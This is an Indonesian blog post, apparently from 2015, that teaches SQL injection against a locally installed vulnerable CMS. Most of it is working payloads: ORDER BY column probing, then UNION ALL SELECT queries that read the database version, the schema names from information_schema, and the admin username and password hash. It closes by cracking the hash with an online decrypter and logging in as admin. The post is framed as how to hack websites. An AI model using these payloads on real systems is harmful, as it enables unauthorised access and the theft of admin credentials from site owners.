Rabu, 04 Februari 2015

hack website

Mengetahui Username dan Password Admin Website



selamat malam, saat ini saya akan menjelaskan sebuah cara untuk meng-hack sebuah website.
cara ini disebut dengan "SQL INJECTION". cara ini sangat mudah untuk pemula seperti saya.

apa yang diperlukan?

  • Yet Another CMS sebagai target percobaan (Yet Another CMS)
  • xampp
  • text editor
  • web browser
setelah didownload cmsnya anda extract ke folder "\opt\lampp\htdocs\Hack\ (Ubuntu)
"c:\xampp\htdocs\Hack" (Windows).
berikut langkah langkahnya:
  1. buka file constants.php pada folder "Hack\includes\constants.php" menggunakan text editor seperti bluefish editor atau notepad++.
  2. edit di bagian berikut.
  3. buka phpmyadmin di web browser anda, kemudian masuk ke database hack, jika belum ada silahkan di buat terlebih dahulu. kemudian import database yang telah di sediakan cms pada folder "database\final_db.sql".
  4. buka web browser kembali lalu buka "http://localhost/Hack".
sekarang kita telah siap melakukan serangan ke website tersebut.

1. disini kita akan mencari dan menemukan celah keamanannya dengan melakukan test standa.
  • http://localhost/Hack/index.php?page=1
  • http://localhost/Hack/index.php?page=2
  • http://localhost/Hack/index.php?page=3
lalu kita lakukan test pada salah satu parameternya.

  • http://localhost/Hack/index.php?page=-1
dengan menambahkan tanda min (-) di belakang angka id.

2. mencari jumlah kolom dengan menggukan perintah "order by".
  • order by 1--
  • order by 2--
  • order by 3--
  • dst
lakukan cara itu secara terus menerus.

setelah mendapatka pesan error  seperti gambar di bawah!, maka kita telah mengetahui jumlah kolom dari databsenya berita adalah 6 karena saat meminta untuk ORDER BY kolom ke 7, terjadi error dengan kata lain, kolom ke 7 itu tidak ada.

3. setelah menemukan jumlah kolom, kini tugas selanjutnya menemukan angka error sebagai celah untuk mengintip ke isi database. 


dari proses tersebut, maka akan muncul angka error adalah 3 dan 6.


4. selanjutnya kita akan mencari informasi dasar database. karena website target memiliki dua angka error, maka kita akan mencari dua informasi sekaligus, yaitu versi MySQL dan nama databasenya.
berikit parameter yang digunakan:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,version(),4,5,database()--"

maka kita mendapatkan hasil:


dari gambar diatas kita mendapatkan nama database adalah "hack" dan versi MySQL-nya adalah 5.6.12.

5. selanjutnya kita harus mencari nama-nama tabel dengan melakukan "group" pada nama nama tabel di dalam database "hack" dengan menggunakan perintah "group_concat".

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--".


maka akan dapat hasil berikut:


pada gambar diatas kita menemukan nama nama tabelnya yaitu "pages", "subjects" dan "users".

6. selanjutnya untuk membuka isi dari tabel tersebut, kita akan menterjemahkan nama tabelnya yaitu "users" ke dalam format heksadesimal. (ascii to hexa).


setelah di terjemahkan maka kita akan mendapat angka heksadesimalnya yaitu "7573657273".

masukkan parameter berikut:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x7573657273--"

dari parameter di atas dapat hasil sebagai berikut:


dari gambar diatas, kita telah menemukan nama kolom dari tabel user, yaitu id, username, hashed_password.

7. berikutnya kita akan melihat isi dari kolom suatu tabelnya dengan langkah akhir adalah membuka isi kolom yang kita anggap ada infrmasi login adminnya.

berikut parameternya:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,concat_ws(0x3a, username, hashed_password),4,5,6 from users--"


dari gambar diata kita telah mengetahui username dan password adminnya.
username : farockrdn
password : f57b455e08f1daebf152a1e07cdd6c1d831993d6

berikutnya kita akan melakukan deskripsi hash passwordnya dengan link penyedia MD5Decrypter.



dari gambar diatas terdapat bahwa password admin adalah "forgetful".

8. mencari page login adminnya, setelah kalian ketemu masukkan username dan password yang telah kita dapati sebelumnya.


selamat mencoba

Tidak ada komentar:

Posting Komentar